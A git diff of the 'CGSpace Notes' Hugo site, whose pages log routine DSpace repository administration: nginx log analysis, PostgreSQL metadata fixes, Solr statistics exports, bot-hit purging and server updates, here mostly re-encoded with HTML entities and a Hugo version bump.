@ -166,7 +166,7 @@
<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -177,7 +177,7 @@
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -338,16 +338,16 @@ DELETE 1
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
</code></pre><ul>
<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2019-04/'>Read more →</a>
</article>
@ -403,7 +403,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
<li>The top IPs before, during, and after this latest alert tonight were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -419,7 +419,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
<li>There were just over 3 million accesses in the nginx logs last month:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -110,7 +110,7 @@
<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -308,7 +308,7 @@
<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
</code></pre><ul>
<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
<li>Time to index ~70,000 items on CGSpace:</li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -166,11 +166,11 @@
<li>I notice this error quite a few times in dspace.log:</li>
</ul>
<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>And there are many of these errors every day for the past month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -266,12 +266,12 @@ dspace.log.2018-01-02:34
<ul>
<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
</code></pre><ul>
<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2017-11/'>Read more →</a>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -151,7 +151,7 @@
<li>Remove redundant/duplicate text in the DSpace submission license</li>
<li>Testing the CMYK patch on a collection with 650 items:</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre>
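<ul>
<li>The <code>&gt;&amp;</code> redirection sends both stdout and stderr to the log file, so progress can be followed from another terminal (a sketch):</li>
</ul>
<pre tabindex="0"><code>$ tail -f /tmp/filter-media-cmyk.txt
</code></pre>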
<a href='https://alanorth.github.io/cgspace-notes/2017-04/'>Read more →</a>
</article>
@ -210,7 +210,7 @@
<ul>
<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
id | collection_id | item_id
-------+---------------+---------
92551 | 313 | 80278
@ -268,11 +268,11 @@ DELETE 1
<li>CGSpace was down for five hours in the morning while I was sleeping</li>
<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
</ul>
<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, ObjectType=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, ObjectType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, ObjectType=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, ObjectType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
</code></pre><ul>
<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
@ -354,7 +354,7 @@ DELETE 1
<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
<li>It looks like we might be able to use OUs now, instead of DCs:</li>
</ul>
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
</code></pre>
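<ul>
<li>For example, membership could be tested by grepping the returned entry&rsquo;s DN for an OU component (the OU value below is hypothetical):</li>
</ul>
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34; | grep -i &#34;ou=ILRI&#34;
</code></pre>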
<a href='https://alanorth.github.io/cgspace-notes/2016-09/'>Read more →</a>
</article>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -140,9 +140,9 @@ $ git rebase -i dspace-5.5
<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
UPDATE 95
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
text_value
------------
(0 rows)
@ -198,7 +198,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<li>I have blocked access to the API now</li>
<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
</code></pre>
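<ul>
<li>Note that <code>uniq</code> only collapses <em>adjacent</em> duplicates, so without a preceding <code>sort</code> this over-counts; a stricter count of distinct IPs (a sketch):</li>
</ul>
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | sort -u | wc -l
</code></pre>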
<a href='https://alanorth.github.io/cgspace-notes/2016-05/'>Read more →</a>
@ -350,7 +350,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2015-11/'>Read more →</a>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Posts"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -109,11 +109,11 @@
<ul>
<li>Send Gaia the last batch of potential duplicates for items 701 to 980:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -o /tmp/2022-03-01-tac-batch4-701-980.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &gt; /tmp/tac4-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2022-03/'>Read more →</a>
</article>
@ -185,13 +185,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
<li>Atmire merged some changes I had submitted to the COUNTER-Robots project</li>
<li>I updated our local spider user agents and then re-ran the list with my <code>check-spider-hits.sh</code> script on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
</span></span><span style="display:flex;"><span>Purging 1989 hits from The Knowledge AI in statistics
</span></span><span style="display:flex;"><span>Purging 1235 hits from MaCoCu in statistics
</span></span><span style="display:flex;"><span>Purging 455 hits from WhatsApp in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 3679
</span></span></code></pre></div>
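<ul>
<li>As a sanity check, the three purges add up to the reported total:</li>
</ul>
<pre tabindex="0"><code>$ echo $((1989 + 1235 + 455))
3679
</code></pre>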
<a href='https://alanorth.github.io/cgspace-notes/2021-12/'>Read more →</a>
</article>
@ -214,9 +214,9 @@ Purging 455 hits from WhatsApp in statistics
<li>I experimented with manually sharding the Solr statistics on DSpace Test</li>
<li>First I exported all the 2019 stats from CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./run.sh -s http://localhost:8081/solr/statistics -f <span style="color:#e6db74">&#39;time:2019-*&#39;</span> -a export -o statistics-2019.json -k uid
</span></span><span style="display:flex;"><span>$ zstd statistics-2019.json
</span></span></code></pre></div>
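<ul>
<li>Loading that dump into a dedicated yearly core should then be the reverse operation after decompressing it (a sketch; the <code>import</code> action and the <code>statistics-2019</code> core name are assumptions):</li>
</ul>
<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics-2019 -a import -o statistics-2019.json -k uid
</code></pre>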
<a href='https://alanorth.github.io/cgspace-notes/2021-11/'>Read more →</a>
</article>
@ -238,15 +238,15 @@ $ zstd statistics-2019.json
<ul>
<li>Export all affiliations on CGSpace and run them against the latest RoR data dump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">1</span> /tmp/2021-10-01-affiliations.csv | sed 1d &gt; /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
</span></span><span style="display:flex;"><span>1879
</span></span><span style="display:flex;"><span>$ wc -l /tmp/2021-10-01-affiliations.txt
</span></span><span style="display:flex;"><span>7100 /tmp/2021-10-01-affiliations.txt
</span></span></code></pre></div><ul>
<li>So we have 1879/7100 (26.46%) matching already</li>
</ul>
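<ul>
<li>The unmatched remainder can be counted the same way (a sketch, assuming the <code>matched</code> column is strictly true/false):</li>
</ul>
<pre tabindex="0"><code>$ csvgrep -c matched -m false /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
5221
</code></pre>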
<a href='https://alanorth.github.io/cgspace-notes/2021-10/'>Read more →</a>
@ -303,8 +303,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
<ul>
<li>Update Docker images on AReS server (linode20) and reboot the server:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
</span></span></code></pre></div><ul>
<li>I decided to upgrade linode20 from Ubuntu 18.04 to 20.04</li>
</ul>
